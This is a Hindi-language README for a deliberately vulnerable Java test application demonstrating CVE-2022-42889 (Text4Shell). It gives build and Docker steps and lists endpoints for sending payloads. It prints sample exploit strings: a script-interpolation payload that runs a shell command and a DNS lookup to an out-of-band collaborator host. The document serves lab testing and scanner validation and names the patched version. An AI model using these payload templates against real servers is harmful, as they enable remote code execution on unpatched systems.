
CVE-2022-42889 के परीक्षण के लिए प्रूफ ऑफ कॉन्सेप्ट एप्लिकेशन
यह एक कमजोर एप्लिकेशन है जिसे CVE-2022-42889 भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट के रूप में विकसित किया गया है।
इसे चलाने के लिए आपको आवश्यकता होगी:
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
mvn clean install
यह ./target फ़ोल्डर बनाएगा और उस फ़ोल्डर के अंदर JAR फ़ाइल text4shell-poc-0.0.1-SNAPSHOT.jar होनी चाहिए।
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar
यह आपके localhost पर डिफ़ॉल्ट रूप से पोर्ट 8080 पर सुनने वाला एक वेब सर्वर शुरू करेगा।
http://localhost:8080/ पर वेबसर्वर तक पहुंचें और आपको निम्न आउटपुट दिखना चाहिए
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
नमूना शोषण पेलोड
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
${dns:<burp collaborator host>)}
सफल शोषण प्रदर्शन के लिए अनुशंसित URL एन्कोडर: https://www.urlencoder.org/.
वैकल्पिक रूप से आप इस PoC को चलाने के लिए Docker का उपयोग कर सकते हैं:
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
docker build --tag=text4shell-poc .
docker run -p 80:8080 text4shell-poc
http://localhost/
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
${dns:<burp collaborator host>)}
सफल शोषण प्रदर्शन के लिए अनुशंसित URL एन्कोडर: https://www.urlencoder.org/.
वैकल्पिक रूप से आप text4shell-scan जैसे स्कैनिंग टूल की प्रभावशीलता को मान्य कर सकते हैं
आपके कोड के कमजोर होने के लिए आपको आवश्यकता है:
commons-text का संस्करण 1.5.0 से 1.10.0 (लेकिन शामिल नहीं) तक चला रहे होंइसका समाधान आपके commons-text के इंस्टेंस को संस्करण 1.10.0 या बाद में अपडेट करना है।
Bryan Smith